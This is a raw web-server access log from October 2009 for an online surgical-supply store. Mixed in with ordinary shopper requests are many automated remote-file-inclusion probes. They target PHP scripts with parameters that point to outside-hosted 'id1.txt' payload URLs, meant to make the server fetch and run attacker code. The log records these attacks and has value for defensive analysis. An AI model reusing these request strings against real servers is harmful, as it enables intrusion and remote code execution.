62.140.23.192 - - [28/Oct/2009:00:43:08 -0400] "GET /logs/access_log.Q109051600//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
62.140.23.192 - - [28/Oct/2009:00:43:11 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
62.140.23.192 - - [28/Oct/2009:00:43:11 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
62.140.23.192 - - [28/Oct/2009:00:43:11 -0400] "GET /logs/access_log.Q109061800//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
122.155.5.84 - - [28/Oct/2009:00:43:11 -0400] "GET //include/write.php?dir=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
122.155.5.84 - - [28/Oct/2009:00:43:11 -0400] "GET /logs//include/write.php?dir=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
122.155.5.84 - - [28/Oct/2009:00:43:11 -0400] "GET /logs/access_log.Q109092500%20%20//include/write.php?dir=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
62.140.23.192 - - [28/Oct/2009:00:43:13 -0400] "GET /logs/access_log.Q109051600//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
122.155.5.84 - - [28/Oct/2009:00:43:19 -0400] "GET /logs/access_log.Q109072200%20%20//include/write.php?dir=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
66.27.196.133 - - [28/Oct/2009:00:43:32 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:43:32 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:43:35 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:43:35 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
72.55.143.249 - - [28/Oct/2009:00:43:44 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.55.143.249 - - [28/Oct/2009:00:43:44 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.55.143.249 - - [28/Oct/2009:00:43:44 -0400] "GET /logs/access_log.Q109091000%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.55.143.249 - - [28/Oct/2009:00:43:44 -0400] "GET /logs/access_log.Q109091500%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.122.46.179 - - [28/Oct/2009:00:44:16 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.122.46.179 - - [28/Oct/2009:00:44:16 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.122.46.179 - - [28/Oct/2009:00:44:16 -0400] "GET /logs/access_log.Q109091500%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.122.46.179 - - [28/Oct/2009:00:44:16 -0400] "GET /logs/access_log.Q109091000%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.122.46.179 - - [28/Oct/2009:00:44:20 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.122.46.179 - - [28/Oct/2009:00:44:20 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.122.46.179 - - [28/Oct/2009:00:44:20 -0400] "GET /logs/access_log.Q109091500%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.122.46.179 - - [28/Oct/2009:00:44:20 -0400] "GET /logs/access_log.Q109091000%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.122.46.179 - - [28/Oct/2009:00:44:21 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.122.46.179 - - [28/Oct/2009:00:44:21 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.122.46.179 - - [28/Oct/2009:00:44:21 -0400] "GET /logs/access_log.Q109091500%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.122.46.179 - - [28/Oct/2009:00:44:21 -0400] "GET /logs/access_log.Q109091000%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:00:44:42 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:00:44:42 -0400] "GET /logs/access_log.Q109091600%20%20//?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:00:44:42 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 200 23667 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:00:44:59 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:00:44:59 -0400] "GET /logs/access_log.Q109091600%20%20//?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:00:44:59 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 200 23667 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:45:06 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:45:06 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:45:07 -0400] "GET /logs/access_log.Q109062100%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:45:07 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:45:07 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:45:08 -0400] "GET /logs/access_log.Q109062100%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:45:09 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:45:09 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:45:09 -0400] "GET /logs/access_log.Q109062100%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:45:12 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:45:12 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:45:12 -0400] "GET /logs/access_log.Q109062100%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:00:45:13 -0400] "GET /logs/access_log.Q109091600//?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:45:14 -0400] "GET /logs/access_log.Q109091500%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:45:14 -0400] "GET /logs/access_log.Q109091500%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:45:16 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:45:16 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:45:16 -0400] "GET /logs/access_log.Q109062100%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:45:16 -0400] "GET /logs/access_log.Q109091500%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:45:18 -0400] "GET /logs/access_log.Q109091500%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:45:25 -0400] "GET /logs/access_log.Q109091500%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:00:45:31 -0400] "GET /logs/access_log.Q109091600//?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
91.194.10.126 - - [28/Oct/2009:00:45:43 -0400] "GET /logs/access_log.Q109082200%20/rss.php?phpraid_dir=http://ffransen.nl/db/id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
91.194.10.126 - - [28/Oct/2009:00:45:43 -0400] "GET /rss.php?phpraid_dir=http://ffransen.nl/db/id.txt??? HTTP/1.1" 404 205 "-" "libwww-perl/5.805"
91.194.10.126 - - [28/Oct/2009:00:45:43 -0400] "GET /logs/rss.php?phpraid_dir=http://ffransen.nl/db/id.txt??? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
91.194.10.126 - - [28/Oct/2009:00:45:43 -0400] "GET /logs/error_log.Q109082200%20/rss.php?phpraid_dir=http://ffransen.nl/db/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
66.27.196.133 - - [28/Oct/2009:00:46:14 -0400] "GET /CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8 HTTP/1.1" 200 64809 "http://www.acesurgical.com/trufix_details.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:16 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:16 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:16 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:16 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:16 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:16 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:16 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:16 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:16 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:16 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:16 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:16 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:16 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:16 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:16 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:16 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:16 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:17 -0400] "GET /images/items/45419001_THUMB.JPG HTTP/1.1" 200 14901 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:17 -0400] "GET /images/items/45418015_THUMB.JPG HTTP/1.1" 200 16032 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:17 -0400] "GET /images/items/45417901_THUMB.JPG HTTP/1.1" 200 14987 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:17 -0400] "GET /images/items/45415001_THUMB.JPG HTTP/1.1" 200 14884 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:17 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
